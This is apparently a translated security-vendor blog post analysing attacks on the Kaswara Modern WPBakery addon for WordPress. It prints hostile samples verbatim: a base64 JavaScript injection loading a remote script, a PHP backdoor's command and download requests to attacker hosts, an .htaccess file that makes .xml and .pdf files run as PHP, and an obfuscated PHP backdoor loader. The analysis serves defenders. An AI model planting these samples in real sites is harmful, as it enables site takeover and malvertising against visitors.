Plugin Addons Pembuat Halaman WPBakery Modern Kaswara yang Rentan Dieksploitasi di Alam Liar

Kembali pada 20 April 2021, teman-teman kami di WPScan melaporkan kerentanan parah pada Kaswara Modern VC Addons, juga dikenal sebagai Kaswara Modern WPBakery Page Builder Addons. Ini tidak tersedia lagi di Codecanyon/Envato, artinya jika Anda menjalankan ini, Anda harus memilih alternatif.

Kerentanan ini memungkinkan pengguna yang tidak diautentikasi untuk mengunggah file sewenang-wenang ke direktori ikon plugin (./wp-content/uploads/kaswara/icons). Ini adalah Indikator Kompromi (IOC) pertama yang dibagikan teman-teman kami di WPScan kepada kami dalam laporan mereka.

Kemampuan untuk mengunggah file arbitrer ke situs web memberi aktor jahat kontrol penuh atas situs, yang membuatnya sulit untuk menentukan muatan akhir dari infeksi ini; oleh karena itu, kami akan menunjukkan kepada Anda semua yang kami temukan sejauh ini (kami sedikit terbawa dalam penelitian, jadi silakan lompat ke bagian IOC jika Anda tidak ingin membaca).

Injeksi Basis Data, aplikasi Android Palsu, dan pintu belakang lainnya

Terima kasih kepada teman kami Denis Sinegubko dari Sucuri karena menunjukkan tindak lanjut injeksi basis data yang digunakan dengan serangan ini.

Pelaku jahat akan memperbarui opsi 'kaswara-customJS' untuk menambahkan cuplikan kode Javascript berbahaya yang berubah-ubah. Berikut salah satu contoh yang kami temukan:

INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES (1856,'kaswara-customJS',
'dmFyIHNjcmlwdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoXCdzY3JpcHRcJyk7CnNjcmlwdC5vbmxvYWQgPSBm
dW5jdGlvbigpIHsKfTsKc2NyaXB0LnNyYyA9IFwiaHR0cHM6Ly9ldmFkYXYubGluay9zY3JpcHQuanNcIjsKZG9jdW1lbnQu
Z2V0RWxlbWVudHNCeVRhZ05hbWUoXCdoZWFkXCcpWzBdLmFwcGVuZENoaWxkKHNjcmlwdCk7','yes');

String yang disandikan base64 ini diterjemahkan menjadi:

var script = document.createElement(\'script\');
script.onload = function() {
};
script.src = \"hxxps://evadav[.]link/script.js\";
document.getElementsByTagName(\'head\')[0].appendChild(script);

Dan seperti yang biasanya terjadi pada skrip jenis ini, skrip ini akan memuat serangkaian cuplikan kode Javascript lainnya, dan muatan akhir akan berupa malvertising atau exploit kit. Ini sangat mirip dengan apa yang dilaporkan Wordfence di sini.

Dalam hal ini, skrip mati di hxxp://double-clickd[.]com/ dan tidak memuat konten buruk apa pun. Saya menemukan Javascript mencurigakan yang memanggil situs ini sejak awal 2020 dan orang-orang telah memblokirnya sejak 2018.

Aplikasi Palsu yang diunggah ke situs

40 aplikasi Android yang ditemukan di situs web yang kami periksa adalah versi palsu dari berbagai aplikasi, seperti AliPay, PayPal, Correos, DHL, dan banyak lainnya, yang untungnya terdeteksi oleh vendor Anti-Virus paling populer menurut analisis VirusTotal ini.

Saya tidak memeriksa maksud aplikasi, tetapi tinjauan singkat tentang izin yang diminta dapat memberi kita gambaran sekilas tentang apa yang dapat dilakukannya:

• android.permission.WRITE_SMS
• android.permission.RECEIVE_SMS
• android.permission.FOREGROUND_SERVICE
• android.permission.KILL_BACKGROUND_PROCESSES
• android.permission.READ_CONTACTS
• android.permission.READ_PHONE_STATE
• android.permission.READ_SMS
• android.permission.ACCESS_NETWORK_STATE
• android.permission.QUERY_ALL_PACKAGES
• android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS
• android.permission.INTERNET
• android.permission.SEND_SMS
• android.permission.CALL_PHONE
• android.permission.WAKE_LOCK
• android.permission.REQUEST_DELETE_PACKAGES

File-file itu tidak segera diunggah menggunakan eksploit Kaswara. Setelah situs disusupi, penyerang akan mengunggah alat lain terlebih dahulu untuk mengontrol situs sepenuhnya.

File yang diunggah

Beberapa backdoor dan malware lainnya juga ditemukan di situs web yang disusupi oleh kerentanan ini. Saya akan membagikan analisis singkat tentang yang paling populer dan menarik di posting ini. Namun, saya ingin pertama-tama fokus pada yang paling kompleks.

Redirect dan aplikasi Palsu

Aplikasi palsu yang saya temukan di beberapa situs yang disusupi tidak diunggah dengan memanfaatkan kerentanan Kaswara. Mereka diunggah ke situs menggunakan alat peretas multi-fungsi, yang memungkinkan penyerang mengunggah beberapa kode jarak jauh (dengan memberikan URL atau string), dan mengarahkan pengguna ke situs jahat.

File dapat dengan mudah diidentifikasi dengan adanya string ini: base64_decode('MTIz');error_reporting(0); fungsi

Cukup menarik itu mengacak segala sesuatu selain ini.

Malware ada di satu baris, yang juga merupakan IOC yang menarik jika Anda mencari jenis anomali kode ini.

Untuk membuatnya lebih mudah dipahami, saya memecahkan kode sebagian besar kode, mengganti nama fungsi yang menarik dan mempercantik kode. Malware memiliki 6 fungsi berbeda, dan 5 di antaranya didasarkan pada nilai yang diteruskan pada variabel $_GET['ts'] . Untuk dokumen ini, mari kita pertimbangkan salah satu dari banyak contoh yang saya temukan: c.php .

/c.php?ts=kt

Ini tidak melakukan apa-apa dan itu akan memaksa situs untuk mengembalikan kesalahan 500 (nanti pada kode).

/c.php?ts=1

Mengubah nilai flag $q1a menjadi true untuk melakukan validasi kode dan menampilkan pesan OK kepada penyerang.

Dalam hal ini situs jarak jauh menjawab: {"body":"","headers":["Location: http:\/\/good-valid-1"],"status":302,"contentType":""}

/c.php?ts=sv&v=”Kode”&p=40bd001563085fc35165329ea1ff5c5ecbdbbeef

Menulis file di server dengan kode yang disediakan oleh konten $_GET["v"] selama $_GET["p"] adalah checksum SHA1 dari 123 (ingat IOC pertama dari base64_decode('MTIz') ? adalah checksum itu).

/c.php?ts=tt

Menulis 5 MB "-" di server, mungkin digunakan untuk menguji apakah fungsi unggah akan bekerja di server.

/c.php?ts=dwm&h=HASH1,HASH2

Ketika malware menerima permintaan ini, ia melakukan tes untuk memverifikasi apakah file yang diunggah berhasil ditulis ke server. Hash MD5 mereka harus diketahui dan dikirim ke variabel $_GET['h'] sebagai nilai yang dipisahkan koma.

/c.php?ts=dw&h=hash&l=URLs_as_CSV

Mengunduh file dari serangkaian situs web pihak ketiga dan menyimpannya di server yang menamainya setelah 12 karakter terakhir dari md5 file yang diunduh.

Ini adalah fungsi yang digunakan untuk mengunggah aplikasi palsu ke server.

Berikut adalah contoh permintaan untuk mengunduh file berbahaya /c.php?ts=dw&h=7e7bcc10406f3787b0a08d4199e6a697&l=http%3A%2F%2Fsmurfetta.ru%2Fhash-de%2F%3Fh%3D7e7bcc10406f3787b0a08d4199e6a697

Mengarahkan akses

Jika opsi kt atau tidak ada opsi yang dipilih, kode melanjutkan ke pengalihan, yang dicapai dengan meminta gumpalan JSON dengan data yang diperlukan. Kemudian melanjutkan untuk mengarahkan pengunjung menggunakan fungsi header.

Responnya seperti ini: {"body":"","headers":["Location: https:\/\/stunningawards.life\/?u=yuek60p&o=2k5p1e0&m=1"],"status":302,"contentType":""}

Fungsi untuk mengeksekusi permintaan cURL dengan parameter yang diperlukan adalah yang ini: Tidak ada yang mewah…

Dan itu dapat diterjemahkan ke permintaan cURL ini:

curl -X POST hxxp://papass[.]ru/click_api/v3 \
    -H 'X-Forwarded-For: 200.171.221.1' \
    -H 'Accept-Language: *' \
    -H 'User-Agent: Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G975F) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/14.0 Chrome/87.0.4280.141 Mobile Safari/537.36' \
    -d 'token=hmfovdqs9vfxp8s4rwqzxbfz6c43bwgb&force_redirect_offer=1&sub_id_1=dbhomeworkout.com&sub_id_2=dbhomeworkout.com&sub_id_3=dbhomeworkout.com&sub_id_4'

URL final, sejauh yang saya bisa uji, acak, tetapi memiliki karakteristik yang sama sebagai halaman palsu untuk layanan atau aplikasi populer.

wp-content/uploads/kaswara/icons/16/javas.xml dan wp-content/uploads/kaswara/icons/16/.htaccess

File XML biasanya tidak ditandai sebagai potensi ancaman, tetapi dalam kasus ini, kami memiliki file .htaccess yang dibuat khusus yang mengubah cara server web melihatnya:

Order Deny,Allow
Allow from all

<FilesMatch "_?(javas|homes|menus)\.(php|xml|pdf)\d*$">
    AddHandler application/x-httpd-php .xml .pdf
    AddType application/x-httpd-php .xml .pdf
    # ---
    SetHandler application/x-httpd-php
    ForceType application/x-httpd-php
    # ---
    php_value engine 1
    # ---
    Order Deny,Allow
    Allow from all
</FilesMatch>

Bahkan, ia memberitahu Apache untuk memahami file javas, rumah, atau menu dengan xml, php, atau pdf sebagai file PHP untuk diproses sesuai dan dieksekusi. Jadi, file mana pun yang ada dalam struktur direktori yang sama dengan .htaccess ini akan mencurigakan.

File javas.xml sama dengan beberapa file berbahaya lainnya yang diunggah ke situs. Saya menemukan perbedaannya adalah bahwa beberapa memiliki satu atau dua baris kosong di akhir file, yang membuat hashing tradisional sedikit lebih rumit.

<?php
$LnWYZK 	  	="\163"."\164" 	 ."\162\137\162\157"	 	.	 	"\164"	. 		  (		 279	 	-  			266)	 	  ; 	 	 if( !empty		 	 (	$ { 	 $LnWYZK	   	
("\137"	.	"\103\102\106" 		 	.		 "\107")}	) 	 		)  			{  	 			 $nNZph 	 =$LnWYZK		 (	 		 "\172". 		"\161". 	(4334	 	
-4329	)		   	 	)			  ; $ouQLkV  	 	= $LnWYZK		 (	 	 	"\157\156"  	.  	"\146" .		 "\162"	.		  	 (	  9680	 	-	  9616)  	 . "\137" 		
. 		"\161"   		.   		"\162\160\142\161\162" 	 ) 		  ; 			  $VNfzSD  	 	=$LnWYZK("\160\145\162"."\156\147\162\137\163\150\141\160"	
. "\147\166\142\141" 			 ); 	  	foreach	($			  { 	 	 $LnWYZK(			  "\137".	 	"\103"  	.	  		"\102" . 			 "\106"	 	. 		"\107" 	 		
)  			}	  as	$IKRDzf   		=>	$NIvHUr	  )( 	  	$nNZph  			(	   	$IKRDzf  	)  	===	 	  		 "c"	  .  (2668 - 	  	2626	 		 )   			.   		
"\145\141"   		."\71"		   .  			"\67"	."\71\145\144"	 	.	  "\71\70\62"	.  	"\143\60" 	 . 	 	 	(314406	  -51163		 )	 	 	. "\60" 			 
.	"\145" 	 . 			 "\71" 	 .		   "\145" . "\71"	  		.	"\70"	  	 .			  "\141"	  		.	 	"\66" . 		"\66"	.	"\144"		  	.    		( 	  	9786	-		 	 
9780 		) 		  		 	&&  	$QZCMY	 		 =	 	  $VNfzSD( ""  			, 	 $ouQLkV (  	$NIvHUr)   		)  	) 		 		 	 	?$QZCMY 	 () : " 		"		  	
;  	}

Kode berbahaya dikaburkan menggunakan string yang disandikan str_rot13 dan base64. Itu juga menggunakan nilai heksadesimal dan operasi matematika untuk menyembunyikan string lebih sedikit. Payload akhir tidak diketahui karena akan membuat fungsi berdasarkan nilai permintaan POST. Namun, payload tampaknya sama setiap saat karena bergantung pada pemeriksaan md5 sebelum membuatnya (c42ea979ed982c02632430e9e98a66d6 adalah hash md5).

Kesimpulan

Karena ini adalah kampanye aktif, pada saat menulis posting ini kami menemukan semakin banyak contoh malware berbeda yang dijatuhkan di situs yang terpengaruh. Beberapa hanya variasi dari apa yang kita miliki di sini, sementara yang lain cukup menarik untuk dianalisis lebih dalam. Cari beberapa posting yang lebih kecil segera hadir untuk menjelajahi beberapa contoh lain ini.

Ini menggambarkan pentingnya memperbarui ekstensi Anda dengan perbaikan keamanan terbaru; jika pengembang tidak merilis perbaikan tepat waktu atau dihapus dari repositori WordPress.org (atau pasar lainnya), kami sangat menyarankan Anda menemukan alternatif yang lebih aman.

Jika Anda khawatir tentang malware dan kerentanan untuk situs Anda, lihat fitur keamanan Jetpack. Jetpack Security menyediakan keamanan situs WordPress yang komprehensif dan mudah digunakan termasuk pencadangan, pemindaian malware, dan perlindungan spam.

Indikator Kompromi

Di sini Anda menemukan daftar lengkap semua IOC yang kami identifikasi: